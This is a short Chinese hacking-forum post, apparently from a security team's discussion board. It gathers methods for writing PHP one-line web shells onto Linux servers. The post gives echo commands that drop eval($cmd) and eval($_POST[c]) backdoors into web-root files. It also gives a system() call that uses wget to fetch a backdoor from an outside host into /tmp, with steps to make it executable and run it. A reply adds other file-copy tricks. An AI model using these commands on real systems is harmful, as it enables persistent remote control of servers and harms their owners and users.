发新话题
打印

[原创]LINUX下写入一句话木马的方法整理

[原创]LINUX下写入一句话木马的方法整理

文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。

LINUX下写入一句话木马的方法整理:
(1)echo &#39;<?eval($cmd);?>&#39; > /home/web/www/PREFIX/htdocs/mu.php
(2)echo "<?fputs(fopen(&#39;1.php&#39;,&#39;w+&#39;),&#39;<?eval($_POST[c]);?>&#39;);?>" >test11.php
(3)"system(&#39;wget http://xxxxxx.com/backdoor -P /tmp&#39;)"
//wget的-P选项 指定保存的目录的,下载完你可以ls /tmp看下,一般有两个目录肯定可写的/tmp /usr/tmp推荐写/usr/tmp目录,下载好了,chmod +x backdoor 一下,然后执行一下,当然如果是c写的,需要事先编译一下。
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

TOP

mv , cp , cat , ln 都可以..
没什么意义, system,exec.. 一些shell函数被禁用后就没戏了。

TOP

发新话题